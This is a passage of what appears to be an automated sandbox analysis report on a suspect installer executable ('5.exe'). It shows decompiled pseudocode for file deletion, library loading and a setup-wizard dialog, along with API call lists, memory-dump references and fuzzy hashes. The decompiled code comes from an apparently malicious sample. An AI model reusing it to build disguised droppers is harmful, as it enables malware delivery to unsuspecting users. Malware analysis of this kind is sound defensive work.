								__eflags =  *_t31;
							}
							goto L31;
						} else {
							goto L12;
						}
						do {
							L12:
							_t75 =  &(_v332.cFileName);
							_t49 = E00405449( &(_v332.cFileName), 0x3f);
							__eflags =  *_t49;
							if( *_t49 != 0) {
								__eflags = _v332.cAlternateFileName;
								if(_v332.cAlternateFileName != 0) {
									_t75 =  &(_v332.cAlternateFileName);
								}
							}
							__eflags =  *_t75 - 0x2e;
							if( *_t75 != 0x2e) {
								L19:
								E0040592B(_t70, _t75);
								__eflags = _v332.dwFileAttributes & 0x00000010;
								if((_v332.dwFileAttributes & 0x00000010) == 0) {
									E004055E3(_t72);
									_t52 = DeleteFileA(_t72);
									__eflags = _t52;
									if(_t52 != 0) {
										E00404CC9(0xfffffff2, _t72);
									} else {
										__eflags = _a8 & 0x00000004;
										if((_a8 & 0x00000004) == 0) {
											 *0x42ebe8 =  *0x42ebe8 + 1;
										} else {
											E00404CC9(0xfffffff1, _t72);
											_push(0);
											_push(_t72);
											E00405679();
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E00405250(_t70, __eflags, _t72, _a8);
									}
								}
								goto L27;
							}
							_t61 =  *((intOrPtr*)(_t75 + 1));
							__eflags = _t61;
							if(_t61 == 0) {
								goto L27;
							}
							__eflags = _t61 - 0x2e;
							if(_t61 != 0x2e) {
								goto L19;
							}
							__eflags =  *((char*)(_t75 + 2));
							if( *((char*)(_t75 + 2)) == 0) {
								goto L27;
							}
							goto L19;
							L27:
							_t55 = FindNextFileA(_a4,  &_v332);
							__eflags = _t55;
						} while (_t55 != 0);
						_t37 = FindClose(_a4);
						goto L29;
					}
					__eflags =  *0x42afe0 - 0x5c;
					if( *0x42afe0 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t37;
					if(_t37 == 0) {
						L31:
						__eflags = _v8;
						if(_v8 == 0) {
							L39:
							return _t37;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t37 = E00405C22(_t72);
							__eflags = _t37;
							if(_t37 == 0) {
								goto L39;
							}
							E0040541E(_t72);
							E004055E3(_t72);
							_t37 = RemoveDirectoryA(_t72);
							__eflags = _t37;
							if(_t37 != 0) {
								return E00404CC9(0xffffffe5, _t72);
							}
							__eflags = _a8 & 0x00000004;
							if((_a8 & 0x00000004) == 0) {
								goto L33;
							}
							E00404CC9(0xfffffff1, _t72);
							_push(0);
							_push(_t72);
							return E00405679();
						}
						L33:
						 *0x42ebe8 =  *0x42ebe8 + 1;
						return _t37;
					}
					__eflags = _a8 & 0x00000002;
					if((_a8 & 0x00000002) == 0) {
						goto L31;
					}
					goto L5;
				}
			}

















                                                                                              0x0040525b
                                                                                              0x0040525f
                                                                                              0x00405268
                                                                                              0x0040526b
                                                                                              0x0040526e
                                                                                              0x00405276
                                                                                              0x00405278
                                                                                              0x00405279
                                                                                              0x00000000
                                                                                              0x00405279
                                                                                              0x00405288
                                                                                              0x00405288
                                                                                              0x0040528b
                                                                                              0x0040528e
                                                                                              0x004052a2
                                                                                              0x004052a9
                                                                                              0x004052ae
                                                                                              0x004052b0
                                                                                              0x004052c0
                                                                                              0x004052b2
                                                                                              0x004052b8
                                                                                              0x004052b8
                                                                                              0x004052c5
                                                                                              0x004052c8
                                                                                              0x004052d3
                                                                                              0x004052d9
                                                                                              0x004052de
                                                                                              0x004052ee
                                                                                              0x004052f0
                                                                                              0x004052f6
                                                                                              0x004052f9
                                                                                              0x004052fc
                                                                                              0x004053b9
                                                                                              0x004053b9
                                                                                              0x004053bd
                                                                                              0x004053bf
                                                                                              0x004053bf
                                                                                              0x004053bf
                                                                                              0x004053bf
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00405302
                                                                                              0x00405302
                                                                                              0x0040530b
                                                                                              0x00405311
                                                                                              0x00405316
                                                                                              0x00405319
                                                                                              0x0040531b
                                                                                              0x0040531f
                                                                                              0x00405321
                                                                                              0x00405321
                                                                                              0x0040531f
                                                                                              0x00405324
                                                                                              0x00405327
                                                                                              0x0040533a
                                                                                              0x0040533c
                                                                                              0x00405341
                                                                                              0x00405348
                                                                                              0x00405360
                                                                                              0x00405366
                                                                                              0x0040536c
                                                                                              0x0040536e
                                                                                              0x00405393
                                                                                              0x00405370
                                                                                              0x00405370
                                                                                              0x00405374
                                                                                              0x00405388
                                                                                              0x00405376
                                                                                              0x00405379
                                                                                              0x0040537e
                                                                                              0x00405380
                                                                                              0x00405381
                                                                                              0x00405381
                                                                                              0x00405374
                                                                                              0x0040534a
                                                                                              0x00405350
                                                                                              0x00405352
                                                                                              0x00405358
                                                                                              0x00405358
                                                                                              0x00405352
                                                                                              0x00000000
                                                                                              0x00405348
                                                                                              0x00405329
                                                                                              0x0040532c
                                                                                              0x0040532e
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00405330
                                                                                              0x00405332
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00405334
                                                                                              0x00405338
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00405398
                                                                                              0x004053a2
                                                                                              0x004053a8
                                                                                              0x004053a8
                                                                                              0x004053b3
                                                                                              0x00000000
                                                                                              0x004053b3
                                                                                              0x004052ca
                                                                                              0x004052d1
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00405290
                                                                                              0x00405290
                                                                                              0x00405292
                                                                                              0x004053c3
                                                                                              0x004053c6
                                                                                              0x004053c9
                                                                                              0x0040541b
                                                                                              0x0040541b
                                                                                              0x0040541b
                                                                                              0x004053cb
                                                                                              0x004053ce
                                                                                              0x004053d9
                                                                                              0x004053de
                                                                                              0x004053e0
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004053e3
                                                                                              0x004053e9
                                                                                              0x004053ef
                                                                                              0x004053f5
                                                                                              0x004053f7
                                                                                              0x00000000
                                                                                              0x00405413
                                                                                              0x004053f9
                                                                                              0x004053fd
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00405402
                                                                                              0x00405407
                                                                                              0x00405408
                                                                                              0x00000000
                                                                                              0x00405409
                                                                                              0x004053d0
                                                                                              0x004053d0
                                                                                              0x00000000
                                                                                              0x004053d0
                                                                                              0x00405298
                                                                                              0x0040529c
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040529c

                                                                                              APIs
                                                                                              • DeleteFileA.KERNEL32(?,?,"C:\Users\user\Desktop\5.exe" ,00000000), ref: 0040526E
                                                                                              • lstrcatA.KERNEL32(0042AFE0,\*.*,0042AFE0,?,00000000,?,"C:\Users\user\Desktop\5.exe" ,00000000), ref: 004052B8
                                                                                              • lstrcatA.KERNEL32(?,0040900C,?,0042AFE0,?,00000000,?,"C:\Users\user\Desktop\5.exe" ,00000000), ref: 004052D9
                                                                                              • lstrlenA.KERNEL32(?,?,0040900C,?,0042AFE0,?,00000000,?,"C:\Users\user\Desktop\5.exe" ,00000000), ref: 004052DF
                                                                                              • FindFirstFileA.KERNEL32(0042AFE0,?,?,?,0040900C,?,0042AFE0,?,00000000,?,"C:\Users\user\Desktop\5.exe" ,00000000), ref: 004052F0
                                                                                              • FindNextFileA.KERNEL32(?,00000010,000000F2,?), ref: 004053A2
                                                                                              • FindClose.KERNEL32(?), ref: 004053B3
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.266522069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.266472405.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266547740.0000000000407000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266618310.0000000000409000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266945973.000000000042C000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266962267.0000000000434000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266984299.0000000000437000.00000002.00020000.sdmp Download File
                                                                                              Similarity
                                                                                              • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                              • String ID: "C:\Users\user\Desktop\5.exe" $C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                              • API String ID: 2035342205-2862307936
                                                                                              • Opcode ID: a22421f420a0055125289edea63265979e601a45820f011afd9a607384fe30c9
                                                                                              • Instruction ID: 18b38f57d6fcfee0f7be8354c3f8d746a349f6914723925c053c0c26f7a8b105
                                                                                              • Opcode Fuzzy Hash: a22421f420a0055125289edea63265979e601a45820f011afd9a607384fe30c9
                                                                                              • Instruction Fuzzy Hash: DF512270804B54A6DB226B228C45BBF3A68CF82759F14817FFC45751C2C7BC4982CE6E
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 6F1F2402, Relevance: 10.7, APIs: 7, Instructions: 196filememoryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 6F1F24DC
                                                                                              • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,?,?,?,?,?,?,?,?,?,6F1F218A,7FC6FA16,6F1F2349), ref: 6F1F2506
                                                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,6F1F218A,7FC6FA16), ref: 6F1F251D
                                                                                              • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,?,?,?,?,?,?,?,?,6F1F218A,7FC6FA16,6F1F2349), ref: 6F1F253F
                                                                                              • FindCloseChangeNotification.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,6F1F218A,7FC6FA16,6F1F2349,00000000,00000000), ref: 6F1F25B2
                                                                                              • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,6F1F218A,7FC6FA16,6F1F2349), ref: 6F1F25BD
                                                                                              • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,6F1F218A,7FC6FA16,6F1F2349,00000000), ref: 6F1F2608
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.270285453.000000006F1F2000.00000040.00020000.sdmp, Offset: 6F1D0000, based on PE: true
                                                                                              • Associated: 00000001.00000002.270187665.000000006F1D0000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270197263.000000006F1D1000.00000020.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270265114.000000006F1EB000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270301108.000000006F1F4000.00000008.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270320448.000000006F1F6000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.270328902.000000006F1FA000.00000002.00020000.sdmp Download File
                                                                                              Similarity
                                                                                              • API ID: Virtual$AllocFileFree$ChangeCloseCreateFindNotificationRead
                                                                                              • String ID:
                                                                                              • API String ID: 656311269-0
                                                                                              • Opcode ID: af7b555d49f7dab9e8ba194529cc05e2405c0ec283943ac24b372fda9630fd69
                                                                                              • Instruction ID: f6ff8b901819602055b28ab049bd595e0aa4421590c86d71155a26ff21d37428
                                                                                              • Opcode Fuzzy Hash: af7b555d49f7dab9e8ba194529cc05e2405c0ec283943ac24b372fda9630fd69
                                                                                              • Instruction Fuzzy Hash: 0E619070E01784ABDB10CFB4C894BEEB7F5AF59790F108119E511EB3A0EB34AD128B64
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00405C49, Relevance: 4.5, APIs: 3, Instructions: 20libraryloaderCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E00405C49(signed int _a4) {
				struct HINSTANCE__* _t5;
				CHAR* _t7;
				signed int _t9;

				_t9 = _a4 << 3;
				_t7 =  *(_t9 + 0x4091f8);
				_t5 = GetModuleHandleA(_t7);
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t9 + 0x4091fc));
				}
				_t5 = LoadLibraryA(_t7); // executed
				if(_t5 != 0) {
					goto L2;
				}
				return _t5;
			}






                                                                                              0x00405c51
                                                                                              0x00405c54
                                                                                              0x00405c5b
                                                                                              0x00405c63
                                                                                              0x00405c70
                                                                                              0x00000000
                                                                                              0x00405c77
                                                                                              0x00405c66
                                                                                              0x00405c6e
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00405c7f

                                                                                              APIs
                                                                                              • GetModuleHandleA.KERNEL32(?,?,00000000,00403126,00000008), ref: 00405C5B
                                                                                              • LoadLibraryA.KERNEL32(?,?,00000000,00403126,00000008), ref: 00405C66
                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00405C77
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.266522069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.266472405.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266547740.0000000000407000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266618310.0000000000409000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266945973.000000000042C000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266962267.0000000000434000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266984299.0000000000437000.00000002.00020000.sdmp Download File
                                                                                              Similarity
                                                                                              • API ID: AddressHandleLibraryLoadModuleProc
                                                                                              • String ID:
                                                                                              • API String ID: 310444273-0
                                                                                              • Opcode ID: fc658b4faf86fd9df0ae4f37537bc1bd8d984ae3d6aa4247b09a4764ab3a2bdc
                                                                                              • Instruction ID: 3d59114c1a23b0d625c809938346f6a0554fd3dae4d1067b70da7b5bee76f7f8
                                                                                              • Opcode Fuzzy Hash: fc658b4faf86fd9df0ae4f37537bc1bd8d984ae3d6aa4247b09a4764ab3a2bdc
                                                                                              • Instruction Fuzzy Hash: B4E08632A0861557E6114F309E4CD6773A8DE866403010439F505F6140D734AC11AFBA
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00405C22, Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 100%
                                                                                              			E00405C22(CHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileA(_a4, 0x42c028); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x42c028;
			}




                                                                                              0x00405c2d
                                                                                              0x00405c36
                                                                                              0x00000000
                                                                                              0x00405c43
                                                                                              0x00405c39
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • FindFirstFileA.KERNEL32(?,0042C028,0042B3E0,00405542,0042B3E0,0042B3E0,00000000,0042B3E0,0042B3E0,?,?,00000000,00405264,?,"C:\Users\user\Desktop\5.exe" ,00000000), ref: 00405C2D
                                                                                              • FindClose.KERNEL32(00000000), ref: 00405C39
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.266522069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.266472405.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266547740.0000000000407000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266618310.0000000000409000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266945973.000000000042C000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266962267.0000000000434000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266984299.0000000000437000.00000002.00020000.sdmp Download File
                                                                                              Similarity
                                                                                              • API ID: Find$CloseFileFirst
                                                                                              • String ID:
                                                                                              • API String ID: 2295610775-0
                                                                                              • Opcode ID: 93a427bfd80f56c82a5a4d8bd6fda67f37b59ad8eed9f57ff1b743868f20ffd4
                                                                                              • Instruction ID: 1d1880cbde17bc14012e82a4269dfe036a3ba599bb462203ffcaea8973668f8b
                                                                                              • Opcode Fuzzy Hash: 93a427bfd80f56c82a5a4d8bd6fda67f37b59ad8eed9f57ff1b743868f20ffd4
                                                                                              • Instruction Fuzzy Hash: A5D0123694DA209BD3541778BD0CC8B7A58DF593317104B32F026F22E4D7388C518EAE
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040380A, Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345windowstringCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 84%
                                                                                              			E0040380A(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
				struct HWND__* _v32;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				signed int _t37;
				signed int _t39;
				intOrPtr _t44;
				struct HWND__* _t49;
				signed int _t67;
				struct HWND__* _t73;
				signed int _t86;
				struct HWND__* _t91;
				signed int _t99;
				int _t103;
				signed int _t115;
				signed int _t116;
				int _t117;
				signed int _t122;
				struct HWND__* _t125;
				struct HWND__* _t126;
				int _t127;
				long _t130;
				int _t132;
				int _t133;
				void* _t134;
				void* _t142;

				_t115 = _a8;
				if(_t115 == 0x110 || _t115 == 0x408) {
					_t35 = _a12;
					_t125 = _a4;
					__eflags = _t115 - 0x110;
					 *0x429fbc = _t35;
					if(_t115 == 0x110) {
						 *0x42eb68 = _t125;
						 *0x429fd0 = GetDlgItem(_t125, 1);
						_t91 = GetDlgItem(_t125, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x428f98 = _t91;
						E00403CDD(_t125);
						SetClassLongA(_t125, 0xfffffff2,  *0x42e348); // executed
						 *0x42e32c = E0040140B(4);
						_t35 = 1;
						__eflags = 1;
						 *0x429fbc = 1;
					}
					_t122 =  *0x40919c; // 0xffffffff
					_t133 = 0;
					_t130 = (_t122 << 6) +  *0x42eb80;
					__eflags = _t122;
					if(_t122 < 0) {
						L34:
						E00403D29(0x40b);
						while(1) {
							_t37 =  *0x429fbc;
							 *0x40919c =  *0x40919c + _t37;
							_t130 = _t130 + (_t37 << 6);
							_t39 =  *0x40919c; // 0xffffffff
							__eflags = _t39 -  *0x42eb84; // 0x2
							if(__eflags == 0) {
								E0040140B(1);
							}
							__eflags =  *0x42e32c - _t133; // 0x0
							if(__eflags != 0) {
								break;
							}
							_t44 =  *0x42eb84; // 0x2
							__eflags =  *0x40919c - _t44; // 0xffffffff
							if(__eflags >= 0) {
								break;
							}
							_t116 =  *(_t130 + 0x14);
							E0040594D(_t116, _t125, _t130, 0x436800,  *((intOrPtr*)(_t130 + 0x24)));
							_push( *((intOrPtr*)(_t130 + 0x20)));
							_push(0xfffffc19);
							E00403CDD(_t125);
							_push( *((intOrPtr*)(_t130 + 0x1c)));
							_push(0xfffffc1b);
							E00403CDD(_t125);
							_push( *((intOrPtr*)(_t130 + 0x28)));
							_push(0xfffffc1a);
							E00403CDD(_t125);
							_t49 = GetDlgItem(_t125, 3);
							__eflags =  *0x42ebec - _t133; // 0x0
							_v32 = _t49;
							if(__eflags != 0) {
								_t116 = _t116 & 0x0000fefd | 0x00000004;
								__eflags = _t116;
							}
							ShowWindow(_t49, _t116 & 0x00000008);
							EnableWindow( *(_t134 + 0x30), _t116 & 0x00000100);
							E00403CFF(_t116 & 0x00000002);
							_t117 = _t116 & 0x00000004;
							EnableWindow( *0x428f98, _t117);
							__eflags = _t117 - _t133;
							if(_t117 == _t133) {
								_push(1);
							} else {
								_push(_t133);
							}
							EnableMenuItem(GetSystemMenu(_t125, _t133), 0xf060, ??);
							SendMessageA( *(_t134 + 0x38), 0xf4, _t133, 1);
							__eflags =  *0x42ebec - _t133; // 0x0
							if(__eflags == 0) {
								_push( *0x429fd0);
							} else {
								SendMessageA(_t125, 0x401, 2, _t133);
								_push( *0x428f98);
							}
							E00403D12();
							E0040592B(0x429fd8, "qjsvdse Setup");
							E0040594D(0x429fd8, _t125, _t130,  &(0x429fd8[lstrlenA(0x429fd8)]),  *((intOrPtr*)(_t130 + 0x18)));
							SetWindowTextA(_t125, 0x429fd8);
							_push(_t133);
							_t67 = E00401389( *((intOrPtr*)(_t130 + 8)));
							__eflags = _t67;
							if(_t67 != 0) {
								continue;
							} else {
								__eflags =  *_t130 - _t133;
								if( *_t130 == _t133) {
									continue;
								}
								__eflags =  *(_t130 + 4) - 5;
								if( *(_t130 + 4) != 5) {
									DestroyWindow( *0x42e338);
									 *0x4297a8 = _t130;
									__eflags =  *_t130 - _t133;
									if( *_t130 <= _t133) {
										goto L58;
									}
									_t73 = CreateDialogParamA( *0x42eb60,  *_t130 +  *0x42e340 & 0x0000ffff, _t125,  *(0x4091a0 +  *(_t130 + 4) * 4), _t130);
									__eflags = _t73 - _t133;
									 *0x42e338 = _t73;
									if(_t73 == _t133) {
										goto L58;
									}
									_push( *((intOrPtr*)(_t130 + 0x2c)));
									_push(6);
									E00403CDD(_t73);
									GetWindowRect(GetDlgItem(_t125, 0x3fa), _t134 + 0x10);
									ScreenToClient(_t125, _t134 + 0x10);
									SetWindowPos( *0x42e338, _t133,  *(_t134 + 0x20),  *(_t134 + 0x20), _t133, _t133, 0x15);
									_push(_t133);
									E00401389( *((intOrPtr*)(_t130 + 0xc)));
									__eflags =  *0x42e32c - _t133; // 0x0
									if(__eflags != 0) {
										goto L61;
									}
									ShowWindow( *0x42e338, 8);
									E00403D29(0x405);
									goto L58;
								}
								__eflags =  *0x42ebec - _t133; // 0x0
								if(__eflags != 0) {
									goto L61;
								}
								__eflags =  *0x42ebe0 - _t133; // 0x0
								if(__eflags != 0) {
									continue;
								}
								goto L61;
							}
						}
						DestroyWindow( *0x42e338);
						 *0x42eb68 = _t133;
						EndDialog(_t125,  *0x4293a0);
						goto L58;
					} else {
						__eflags = _t35 - 1;
						if(_t35 != 1) {
							L33:
							__eflags =  *_t130 - _t133;
							if( *_t130 == _t133) {
								goto L61;
							}
							goto L34;
						}
						_push(0);
						_t86 = E00401389( *((intOrPtr*)(_t130 + 0x10)));
						__eflags = _t86;
						if(_t86 == 0) {
							goto L33;
						}
						SendMessageA( *0x42e338, 0x40f, 0, 1);
						__eflags =  *0x42e32c - _t133; // 0x0
						return 0 | __eflags == 0x00000000;
					}
				} else {
					_t125 = _a4;
					_t133 = 0;
					if(_t115 == 0x47) {
						SetWindowPos( *0x429fb0, _t125, 0, 0, 0, 0, 0x13);
					}
					if(_t115 == 5) {
						asm("sbb eax, eax");
						ShowWindow( *0x429fb0,  ~(_a12 - 1) & _t115);
					}
					if(_t115 != 0x40d) {
						__eflags = _t115 - 0x11;
						if(_t115 != 0x11) {
							__eflags = _t115 - 0x111;
							if(_t115 != 0x111) {
								L26:
								return E00403D44(_t115, _a12, _a16);
							}
							_t132 = _a12 & 0x0000ffff;
							_t126 = GetDlgItem(_t125, _t132);
							__eflags = _t126 - _t133;
							if(_t126 == _t133) {
								L13:
								__eflags = _t132 - 1;
								if(_t132 != 1) {
									__eflags = _t132 - 3;
									if(_t132 != 3) {
										_t127 = 2;
										__eflags = _t132 - _t127;
										if(_t132 != _t127) {
											L25:
											SendMessageA( *0x42e338, 0x111, _a12, _a16);
											goto L26;
										}
										__eflags =  *0x42ebec - _t133; // 0x0
										if(__eflags == 0) {
											_t99 = E0040140B(3);
											__eflags = _t99;
											if(_t99 != 0) {
												goto L26;
											}
											 *0x4293a0 = 1;
											L21:
											_push(0x78);
											L22:
											E00403CB6();
											goto L26;
										}
										E0040140B(_t127);
										 *0x4293a0 = _t127;
										goto L21;
									}
									__eflags =  *0x40919c - _t133; // 0xffffffff
									if(__eflags <= 0) {
										goto L25;
									}
									_push(0xffffffff);
									goto L22;
								}
								_push(_t132);
								goto L22;
							}
							SendMessageA(_t126, 0xf3, _t133, _t133);
							_t103 = IsWindowEnabled(_t126);
							__eflags = _t103;
							if(_t103 == 0) {
								goto L61;
							}
							goto L13;
						}
						SetWindowLongA(_t125, _t133, _t133);
						return 1;
					} else {
						DestroyWindow( *0x42e338);
						 *0x42e338 = _a12;
						L58:
						if( *0x42afd8 == _t133) {
							_t142 =  *0x42e338 - _t133; // 0x0
							if(_t142 != 0) {
								ShowWindow(_t125, 0xa);
								 *0x42afd8 = 1;
							}
						}
						L61:
						return 0;
					}
				}
			}
































                                                                                              0x00403813
                                                                                              0x0040381c
                                                                                              0x0040395d
                                                                                              0x00403961
                                                                                              0x00403965
                                                                                              0x00403967
                                                                                              0x0040396c
                                                                                              0x00403977
                                                                                              0x00403982
                                                                                              0x00403987
                                                                                              0x00403989
                                                                                              0x0040398b
                                                                                              0x0040398e
                                                                                              0x00403993
                                                                                              0x004039a1
                                                                                              0x004039ae
                                                                                              0x004039b5
                                                                                              0x004039b5
                                                                                              0x004039b6
                                                                                              0x004039b6
                                                                                              0x004039bb
                                                                                              0x004039c1
                                                                                              0x004039c8
                                                                                              0x004039ce
                                                                                              0x004039d0
                                                                                              0x00403a10
                                                                                              0x00403a15
                                                                                              0x00403a1a
                                                                                              0x00403a1a
                                                                                              0x00403a1f
                                                                                              0x00403a28
                                                                                              0x00403a2a
                                                                                              0x00403a2f
                                                                                              0x00403a35
                                                                                              0x00403a39
                                                                                              0x00403a39
                                                                                              0x00403a3e
                                                                                              0x00403a44
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00403a4a
                                                                                              0x00403a4f
                                                                                              0x00403a55
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00403a5e
                                                                                              0x00403a66
                                                                                              0x00403a6b
                                                                                              0x00403a6e
                                                                                              0x00403a74
                                                                                              0x00403a79
                                                                                              0x00403a7c
                                                                                              0x00403a82
                                                                                              0x00403a87
                                                                                              0x00403a8a
                                                                                              0x00403a90
                                                                                              0x00403a98
                                                                                              0x00403a9e
                                                                                              0x00403aa4
                                                                                              0x00403aa8
                                                                                              0x00403aaf
                                                                                              0x00403aaf
                                                                                              0x00403aaf
                                                                                              0x00403ab9
                                                                                              0x00403acb
                                                                                              0x00403ad7
                                                                                              0x00403adc
                                                                                              0x00403ae6
                                                                                              0x00403aec
                                                                                              0x00403aee
                                                                                              0x00403af3
                                                                                              0x00403af0
                                                                                              0x00403af0
                                                                                              0x00403af0
                                                                                              0x00403b03
                                                                                              0x00403b1b
                                                                                              0x00403b1d
                                                                                              0x00403b23
                                                                                              0x00403b38
                                                                                              0x00403b25
                                                                                              0x00403b2e
                                                                                              0x00403b30
                                                                                              0x00403b30
                                                                                              0x00403b3e
                                                                                              0x00403b4e
                                                                                              0x00403b5f
                                                                                              0x00403b66
                                                                                              0x00403b6c
                                                                                              0x00403b70
                                                                                              0x00403b75
                                                                                              0x00403b77
                                                                                              0x00000000
                                                                                              0x00403b7d
                                                                                              0x00403b7d
                                                                                              0x00403b7f
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00403b85
                                                                                              0x00403b89
                                                                                              0x00403bae
                                                                                              0x00403bb4
                                                                                              0x00403bba
                                                                                              0x00403bbc
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00403be2
                                                                                              0x00403be8
                                                                                              0x00403bea
                                                                                              0x00403bef
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00403bf5
                                                                                              0x00403bf8
                                                                                              0x00403bfb
                                                                                              0x00403c12
                                                                                              0x00403c1e
                                                                                              0x00403c37
                                                                                              0x00403c3d
                                                                                              0x00403c41
                                                                                              0x00403c46
                                                                                              0x00403c4c
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00403c56
                                                                                              0x00403c61
                                                                                              0x00000000
                                                                                              0x00403c61
                                                                                              0x00403b8b
                                                                                              0x00403b91
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00403b97
                                                                                              0x00403b9d
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00403ba3
                                                                                              0x00403b77
                                                                                              0x00403c6e
                                                                                              0x00403c7a
                                                                                              0x00403c81
                                                                                              0x00000000
                                                                                              0x004039d2
                                                                                              0x004039d2
                                                                                              0x004039d5
                                                                                              0x00403a08
                                                                                              0x00403a08
                                                                                              0x00403a0a
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00403a0a
                                                                                              0x004039d7
                                                                                              0x004039db
                                                                                              0x004039e0
                                                                                              0x004039e2
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004039f2
                                                                                              0x004039fa
                                                                                              0x00000000
                                                                                              0x00403a00
                                                                                              0x0040382e
                                                                                              0x0040382e
                                                                                              0x00403832
                                                                                              0x00403837
                                                                                              0x00403846
                                                                                              0x00403846
                                                                                              0x0040384f
                                                                                              0x00403858
                                                                                              0x00403863
                                                                                              0x00403863
                                                                                              0x0040386f
                                                                                              0x0040388b
                                                                                              0x0040388e
                                                                                              0x004038a1
                                                                                              0x004038a7
                                                                                              0x0040394a
                                                                                              0x00000000
                                                                                              0x00403953
                                                                                              0x004038ad
                                                                                              0x004038ba
                                                                                              0x004038bc
                                                                                              0x004038be
                                                                                              0x004038dd
                                                                                              0x004038dd
                                                                                              0x004038e0
                                                                                              0x004038e5
                                                                                              0x004038e8
                                                                                              0x004038f8
                                                                                              0x004038f9
                                                                                              0x004038fb
                                                                                              0x00403931
                                                                                              0x00403944
                                                                                              0x00000000
                                                                                              0x00403944
                                                                                              0x004038fd
                                                                                              0x00403903
                                                                                              0x0040391c
                                                                                              0x00403921
                                                                                              0x00403923
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00403925
